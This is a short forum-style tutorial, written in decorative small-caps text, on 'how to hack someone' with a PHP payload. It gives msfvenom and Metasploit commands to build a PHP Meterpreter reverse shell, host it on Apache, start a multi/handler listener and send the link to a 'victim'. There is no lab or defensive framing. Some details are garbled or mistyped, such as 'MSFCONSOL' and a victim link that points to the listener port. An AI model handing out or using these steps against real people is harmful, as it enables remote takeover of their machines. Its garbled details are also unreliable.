How to hack someone using a php~payload

:sparkling_heart:sᴏ ʟᴇᴛs ᴍᴀᴋᴇ ᴘᴀʏʟᴏᴀᴅs ᴡɪᴛʜ ᴘʜᴘ ᴜsɪɴɢ ᴍsғᴠᴇᴍᴏɴ

:sparkling_heart:ᴡʜᴀᴛ ɪs ᴍsғᴠᴇᴍᴏɴ?? ᴡᴇʟʟ ᴍᴇᴛᴀsᴘʟᴏɪᴛ ғʀᴀᴍᴇᴡᴏʀᴋ ᴠᴇɴᴏᴍ ɪs ᴀ ᴘᴀʏʟᴏᴀᴅ ɢᴇɴ ᴜsᴇᴅ ᴏɴ ʟɪɴᴜɴx ᴛᴏ ɢᴇɴᴇʀᴀᴛᴇ ᴘᴀʏʟᴏᴀᴅs ғᴏʀ ᴇxᴘʟᴏɪᴛᴀᴛɪᴏɴ

:sparkling_heart:ʟᴇᴛs sᴛᴀʀᴛ ʙʏ sᴛᴀʀᴛɪɴɢ ᴀᴘᴀᴄʜᴇ2 sᴏ ᴏᴘᴇɴ ᴛᴇʀᴍɪɴᴀʟ ᴀɴᴅ ᴛʏᴘᴇ

ᴄᴏᴅᴇ:
–––––––––––––––––––
sᴇʀᴠɪᴄᴇ ᴀᴘᴀᴄʜᴇ2 sᴛᴀʀᴛ

:cyclone:sᴛᴇᴘ 1:
ɴᴏᴡ ᴡᴇ ɴᴇᴇᴅ ᴏᴜʀ ʟᴏᴄᴀʟ ɪᴘ ᴏʀ ᴇxᴛᴇʀɴᴀʟ ɪᴘ ғᴏʀ ʟᴏᴄᴀʟ ɪᴘ ᴇɴᴛᴇʀ

ᴄᴏᴅᴇ:
–––––––––––––––––––
ɪғᴄᴏɴғɪɢ
ᴀɴᴅ ғᴏʀ ᴇxᴛᴇʀɴᴀʟ ɢᴏᴏɢʟᴇ ᴡʜᴀᴛs ᴍʏ ɪᴘ
ɴᴏᴛᴇ ɪғ ᴜsɪɴɢ ᴇxᴛᴇʀɴᴀʟ ʟɪɴᴋ ᴜ ɴᴇᴇᴅ ᴛᴏ ғᴏʀᴡᴀʀᴅ ᴛʜᴇ ᴘᴏʀᴛs ᴏɴ ʏᴏᴜʀ ʀᴏᴜᴛᴇʀ

:cyclone:sᴛᴇᴘ 2:
ɴᴏᴡ ʏᴏᴜ ʜᴀᴠᴇ ᴛʜᴇ ʟᴏᴄᴀʟ ɪᴘ, sᴏ ʟᴇᴛs ᴍᴀᴋᴇ ᴛʜᴇ ᴘᴀʏʟᴏᴀᴅ
ᴇɴᴛᴇʀ ᴛʜɪs ᴄᴏᴍᴍᴀɴᴅ:

ᴄᴏᴅᴇ:
–––––––––––––––––––
ᴍsғᴠᴇɴᴏᴍ -ᴘ ᴘʜᴘ/ᴍᴇᴛᴇʀᴘʀᴇᴛᴇʀ/ʀᴇᴠᴇʀsᴇ_ᴛᴄᴘ ʟʜᴏsᴛ= 192.168.8.107 ʟᴘᴏʀᴛ=4444 -ᴇ ᴘʜᴘ/ʙᴀsᴇ64 -ғ ʀᴀᴡ > /ʀᴏᴏᴛ/ᴅᴇsᴋᴛᴏᴘ/ʜᴏᴍᴇ.ᴘʜᴘ

:cyclone:sᴛᴇᴘ 3:
ɴᴏᴡ ɢᴏ ᴛᴏ ᴛʜᴇ ᴅᴇsᴋᴛᴏᴘ ᴀɴᴅ ᴄᴏᴘʏ ᴛʜᴇ ᴘᴀʏʟᴏᴀᴅ ᴛᴏ ʏᴏᴜʀ ʜᴛᴍʟ ғɪʟᴇ ɪɴ /ᴠᴀʀ/ᴡᴡ ᴡ/ʜᴛᴍʟ ғᴏʟᴅᴇʀ
ʀᴇᴍᴏᴠᴇ ᴛʜᴇ sᴘᴀᴄᴇ ^^

:cyclone:sᴛᴇᴘ 4:
ɴᴏᴡ ᴏᴘᴇɴ ᴀ ɴᴇᴡ ᴛᴇʀᴍɪɴᴀʟ ᴀɴᴅ ᴛʏᴘᴇ

ᴄᴏᴅᴇ:
–––––––––––––––––––
MSFCONSOL

:cyclone:sᴛᴇᴘ 5:
TYPE BELOW COMMAND’S

ᴄᴏᴅᴇ:
–––––––––––––––––––
USE EXPLOIT/MULTI/HANDLER

ᴄᴏᴅᴇ:
–––––––––––––––––––
SET PAYLOAD PHP/METERPRETER/REVERSE_TCP

ᴄᴏᴅᴇ:
–––––––––––––––––––
SET LHOST [YOUR LOCAL IP]

ᴄᴏᴅᴇ:
–––––––––––––––––––
SET LPORT 4444

ᴄᴏᴅᴇ:
–––––––––––––––––––
EXPLOIT

:cyclone:sᴛᴇᴘ 6:
ɴᴏᴡ sᴇɴᴅ ᴛʜᴇ ᴠɪᴄᴛᴜᴍ ᴛʜᴇ ʟɪɴᴋ 192.168.8.107:4444/Home.php

:cyclone:sᴛᴇᴘ 7:
ɴᴏᴡ ᴛʏᴘᴇ ʜᴇʟᴘ ᴀɴᴅ ʏᴏᴜ ɢᴇᴛ ᴀ ғᴜʟʟ ʟɪsᴛ ᴄᴏᴍᴍᴀɴᴅs ʏᴏᴜ ᴄᴀɴ ʀᴜɴ ᴜɴᴅᴇʀ ᴍᴇᴛᴀsᴘʟᴏɪᴛ

Thanks
Source: The DeepNet

4 Likes